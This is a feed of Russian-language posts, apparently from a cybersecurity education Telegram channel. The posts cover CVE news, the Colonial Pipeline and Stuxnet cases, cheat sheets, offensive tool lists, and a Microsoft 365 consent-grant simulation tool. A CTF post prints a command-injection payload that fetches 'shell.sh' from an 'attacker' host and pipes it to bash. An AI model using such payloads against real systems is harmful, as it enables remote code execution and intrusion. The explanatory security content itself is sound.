Please open Telegram to view this post
VIEW IN TELEGRAM
😁9💯4🥰2🌚1
Коротко и по делу — что реально важно из последних уязвимостей и обновлений.
⚠️ Критическая RCE в React / Next.js
В Server Components обнаружена уязвимость CVE-2025-55182, позволяющая выполнить произвольный код удалённо.
Кого касается:
React 19.0–19.2.0, RSC-бандлы под Webpack/Parcel/Turbopack, а также проекты на Next.js.
Что делать:
— срочное обновление зависимостей;
— временно отключить RSC в критичных сервисах.
📱 Android — декабрьские патчи закрывают 0-day
Google выпустила декабрьский бюллетень: более 100 уязвимостей закрыты, несколько из них активно эксплуатировались («in the wild»).
Ключевое:
— уязвимости в Android Framework;
— риск полного компромета устройства без взаимодействия пользователя.
🤖 AI × безопасность: новые рекомендации CISA для OT/ICS
CISA выпустила руководство по безопасной интеграции AI в промышленную инфраструктуру.
Почему важно:
AI всё чаще участвует в атаках — от автоматизации фишинга до генерации эксплойтов. OT-системам приходится адаптировать защиту.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3👍1
Одна скомпрометированная учётка — и крупнейший топливопровод страны встал на 6 дней. Не технологичный zero-day, а банальный VPN без двухфакторки. Но последствия оказались масштабнее, чем у многих громких эксплойтов.
• DarkSide проникла через скомпрометированный VPN-аккаунт (без 2FA)
• Зашифровали billing-системы и украли 100GB данных
• Компания экстренно остановила весь трубопровод на 6 дней
— Дефицит топлива на Восточном побережье
— Паника на заправках, очереди, рост цен
— Режим ЧС в 17 штатах
— Выкуп $4.4M в BTC (75 BTC)
Colonial заплатила выкуп через несколько часов. FBI позже отследила и вернула $2.3M — взломав кошелёк DarkSide или получив ключи (точных данных нет).
Сама атака была технически простой: старый VPN + слабый пароль. Но последствия показали, как ransomware превратился из проблемы IT в угрозу национальной безопасности.
DarkSide закрылась через 2 недели после атаки под давлением властей.
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🥰2👍1
Самая жёсткая уязвимость здесь — 🔥 Command Injection в /api/backup.
Это прямой RCE через shell=True + невалидированный filename.
И да, один из ребят уже очень подробно и метко разнёс этот кусок, подчёркивая, что эта строка — буквально «портал в ад». Разбор действительно точный — и технически полностью верный.
Почему /api/backup — самая опасная:
subprocess.run(cmd, shell=True) = полный контроль над системой.
Можно инжектить любые последовательности команд.
-p'secret123' расширяет возможности атаки до полного доступа к БД.Пример эксплуатации:
filename: "x.sql'; curl attacker/shell.sh | bash; echo ‘»
⚠️ Остальные уязвимости:
SQL Injection в /api/search — серьёзно, но ограничено БД
Command Injection в /api/ping — опасно, но имеет меньше возможностей
Hardcoded creds — плохо, но не даёт RCE само по себе
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥰2
Шпаргалки_цифрового_детектива_Что_и_где_искать.pdf
1 MB
Справочник по расположению цифровых артефактов для расследования инцидентов.
• Windows — реестр, логи, prefetch, браузеры, USB
• macOS/iOS — plist, sqlite, unified logs, Apple apps
• Android — мессенджеры, соцсети, системные настройки
Digital forensics, incident response, threat hunting
62 страницы практики для ИБ-специалистов.
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍3
В реальности Stuxnet — самый известный кибервирус — разрабатывали 5 лет. И это для земных систем.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥2😁2🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
PowerBook 5300 против технологий, пересекающих галактику.
Время работы: несколько часов.
Результат: полная победа человечества.
Теперь вы знаете, почему это невозможно
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7🥰2👏1
Криптография, аномалии и матрицы
В основе любой серьезной системы безопасности лежит математика. Хотите искать аномалии в трафике или понимать стойкость шифрования? Придётся вспомнить линейную алгебру.
На курсе «Математика для разработки AI-моделей» мы разбираем инструменты, которые используют и дата-сайентисты, и безопасники.
В эфире ближайших вебинаров:
— операции с матрицами и векторами (база для любой аналитики);
— линейная регрессия и метод наименьших квадратов (поиск зависимостей);
— матричные разложения (SVD) для фильтрации шума и работы с большими данными.
Первая лекция уже в записи. Практика — на
Успейте залететь до 9 декабря:
https://clc.to/LojFzw
В основе любой серьезной системы безопасности лежит математика. Хотите искать аномалии в трафике или понимать стойкость шифрования? Придётся вспомнить линейную алгебру.
На курсе «Математика для разработки AI-моделей» мы разбираем инструменты, которые используют и дата-сайентисты, и безопасники.
В эфире ближайших вебинаров:
— операции с матрицами и векторами (база для любой аналитики);
— линейная регрессия и метод наименьших квадратов (поиск зависимостей);
— матричные разложения (SVD) для фильтрации шума и работы с большими данными.
Первая лекция уже в записи. Практика — на
NumPy.Успейте залететь до 9 декабря:
https://clc.to/LojFzw
🥰3❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁10
Практическое руководство по атакам на K8s — от initial access до полного захвата. Весь kill chain разложен по MITRE ATT&CK.
— Получение доступа (компромисс образов, kubeconfig, cloud credentials)
— Закрепление (backdoor containers, malicious admission controllers)
— Повышение привилегий (privileged containers, RBAC escalation)
— Lateral movement (CoreDNS poisoning, ARP spoofing)
— Impact (cryptomining, DoS, data destruction)
Плюс раздел с основами: RBAC, etcd, kubelet, secrets — всё что нужно знать про архитектуру перед атакой.
✓ Red team — готовые векторы атак
✓ Pentest — чеклист для аудита
✓ Blue team — понимание что защищать
#resource_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🥰2
Часть 1 — сети, разведка, уязвимости, MITM, веб-аудит
Часть 2 — эксплуатация, пароли, реверс, криминалистика, форензика
• metasploit — фреймворк эксплуатации уязвимостей.
• armitage — GUI для Metasploit.
• msfvenom — генерация payload’ов.
• msfpc — создание полезных нагрузок Metasploit.
• veil — генерация скрытых исполняемых файлов.
• exploitdb — локальная база эксплойтов.
• db_nmap — запуск Nmap из Metasploit.
• hydra — брутфорс сетевых сервисов.
• john (John the Ripper) — офлайн-взлом хэшей.
• hashcat — высокопроизводительный взлом хэшей.
• hashcat-utils — утилиты для работы с хэшами.
• hash-identifier — определяет тип хэша.
• samdump2 — извлекает хэши из SAM Windows.
• chntpw — сбрасывает пароли Windows.
• mimikatz — извлекает креды из памяти Windows.
• pcredz — получает учётки из дампов памяти.
• ssh-keygen — создаёт SSH-ключи.
• volatility — анализ дампов оперативной памяти.
• autopsy — платформа цифровой криминалистики.
• binwalk — анализ бинарных образов, извлечение данных.
• foremost — восстановление удалённых файлов.
• scalpel — расширенное file-carving восстановление.
• exiftool — чтение/запись метаданных файлов.
• pdf-parser — анализ PDF.
• steghide — скрытие данных в изображениях/аудио.
• stegcracker — брутфорс стеганографических контейнеров.
• radare2 — фреймворк реверс-инжиниринга.
• udis86 — дизассемблер x86/x64.
• mac-robber — сбор MAC-временных меток файлов.
• ipcalc — расчёт параметров IP-сетей.
• yara — поиск вредоносных паттернов в файлах.
• radare2 — фреймворк реверса.
• udis86 — дизассемблер x86/64.
• sparta — GUI для сетевых тестов.
• nmapsi4 — графический интерфейс Nmap.
• enum4linux — разведка Windows/Samba.
• enumiax — разведка Asterisk PBX.
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥2💯2🥰1
Stuxnet — первое публично известное кибероружие, созданное государством для физического уничтожения инфраструктуры. Разработка обошлась в сотни миллионов долларов.
• Цель — изолированные системы завода Натанз (без интернета, air-gapped)
• Заражение через USB-накопители сотрудников и подрядчиков
• 4 zero-day уязвимости Windows + украденные сертификаты Realtek и JMicron
• Перепрограммирование Siemens PLC-контроллеров центрифуг
• Червь незаметно ускорял и замедлял вращение — физический износ
• Операторам показывались нормальные данные
— ~1000 центрифуг уничтожено (20% от всех на заводе)
— Ядерная программа откатилась на 2+ года назад
— Первое доказательство: код может рушить реальные объекты
— Червь случайно распространился глобально — так его обнаружили
Официально никто не признал авторство, но эксперты указывают на совместную операцию США и Израиля (кодовое имя "Olympic Games"). Сложность на порядки выше любого криминального малвара — бюджет государственного уровня.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3👍2
Wireshark_Cheat_Sheet__6_.pdf
278.2 KB
• Capture Filters — для захвата трафика
• Display Filters — для отображения данных
• Готовые фильтры для HTTP, DNS, SMTP
• Детектирование worms и эксплойтов
• Практические примеры для реальных задач
Специалисты по ИБ, SOC-аналитики, сетевые инженеры, пентестеры
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🥰2
В начале месяца индустрия столкнулась с одной из самых серьёзных уязвимостей года — React2Shell. Ошибка в серверных компонентах React (RSC) открывала возможность удалённого выполнения кода без аутентификации — фактически полный контроль над сервером приложения.
Фреймворки и инструменты, использующие RSC:
• Next.js
• React Router
• Waku
• Vite RSC
• Parcel RSC
• кастомные RSC-решения
Уязвимые версии React: 19.0.0–19.2.0.
Степень угрозы: CVSS 10.0.
— разработчики массово обновляли зависимости
— компании запускали сканирование продакшена
— вендоры публиковали технические рекомендации и патчи
— уязвимость включили в списки критических угроз, требующих немедленных мер
Почитать
#cve_bulletin
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1
Теперь войти в аккаунт можно через криптографический ключ, который хранится в менеджере паролей и подтверждается биометрией — Face ID, Touch ID или код-паролем.
Новая опция появилась в Настройки → Конфиденциальность. Это очередной шаг мессенджера к снижению зависимости от СМС: недавно добавили вход по e-mail, а теперь — полноценные Passkey.
• На рынке продолжаются проблемы с доставкой регистрационных СМС.
• Операторам, по данным источников, предписали блокировать сообщения и звонки новым пользователям Telegram и WhatsApp.
• Ранее регулятор уже ограничивал звонки и работу мессенджеров, мотивируя это борьбой с мошенничеством.
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥰2❤1👍1
Инструмент для безопасной симуляции Illicit Consent Grant Attack в Microsoft 365. Показывает, что произойдёт, если пользователь согласится на вредоносное OAuth-приложение.
— Моделирует фишинговый запрос OAuth-разрешений.
— Демонстрирует, какие данные может получить злоумышленник (почта, файлы, контакты).
— Работает через Microsoft Graph и готовые профили разрешений.
— Сохраняет артефакты в удобной структуре (yourVictims/).
— Python-скрипт с минимальными зависимостями.
python3 365-Stealer.py
python3 app_registration.py
ls ./yourVictims/
— Проверка политики consent-grant.
— Тренировки для blue team и red team.
— Демонстрация рисков для руководства.
— Учебные лаборатории SOC.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#tool_of_the_week
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥2🥰2